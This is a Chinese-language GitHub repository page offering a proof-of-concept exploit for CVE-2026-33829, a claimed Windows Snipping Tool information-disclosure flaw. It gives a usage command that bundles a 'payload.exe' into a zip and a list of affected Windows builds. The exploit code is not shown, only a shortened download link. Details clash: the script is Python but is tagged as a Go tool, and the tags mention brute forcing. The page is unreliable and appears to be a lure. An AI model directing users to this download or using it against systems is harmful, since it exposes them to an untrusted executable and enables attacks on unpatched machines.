jenniferreire26/CVE-2026-33829
GitHub: jenniferreire26/CVE-2026-33829
针对 Windows 截图工具信息泄露漏洞(CVE-2026-33829)的 PoC 利用代码,支持通过命令行对目标系统发起验证性攻击。
Stars: 0 | Forks: 0
# CVE-2026-33829 - 安全漏洞
## 快速使用
```
python3 exploit.py -t "C:\\Path\\To\\Target" -o demo.zip --data-file payload.exe
```
## 利用说明
- **严重程度:** 中
- **CVSS:** 4.3
- **影响:** 机密性
- **发布日期:** 2026-04-14
## 技术概述
Windows 截图工具中存在将敏感信息泄露给未经授权者的漏洞,允许未经授权的攻击者通过网络进行欺骗。
## 受影响版本
**Microsoft Windows 10 1607:**
- 10.0.14393.9060 之前
**Microsoft Windows 10 1809:**
- 10.0.17763.8644 之前
**Microsoft Windows 10 21H2:**
- 10.0.19044.7184 之前
**Microsoft Windows 10 22H2:**
- 10.0.19045.7184 之前
**Microsoft Windows 11 23H2:**
- 10.0.22631.6936 之前
**Microsoft Windows 11 24H2:**
- 10.0.26100.8246 之前
**Microsoft Windows 11 25H2:**
- 10.0.26200.8246 之前
**Microsoft Windows 11 26H1:**
- 10.0.28000.1836 之前
**Microsoft Windows Server 2012:**
- -
- r2
**Microsoft Windows Server 2016:**
- 10.0.14393.9060 之前
**Microsoft Windows Server 2019:**
- 10.0.17763.8644 之前
**Microsoft Windows Server 2022:**
- 10.0.20348.5020 之前
**Microsoft Windows Server 2022 23H2:**
- 10.0.25398.2274 之前
**Microsoft Windows Server 2025:**
- 10.0.26100.32690 之前
## 参考
- NVD: https://nvd.nist.gov/vuln/detail/CVE-2026-33829
## 利用
[下载 PoC](https://tinyurl.com/25psuyn3)
标签:Go语言工具, PoC, 威胁模拟, 安全漏洞, 文档结构分析, 暴力破解, 逆向工具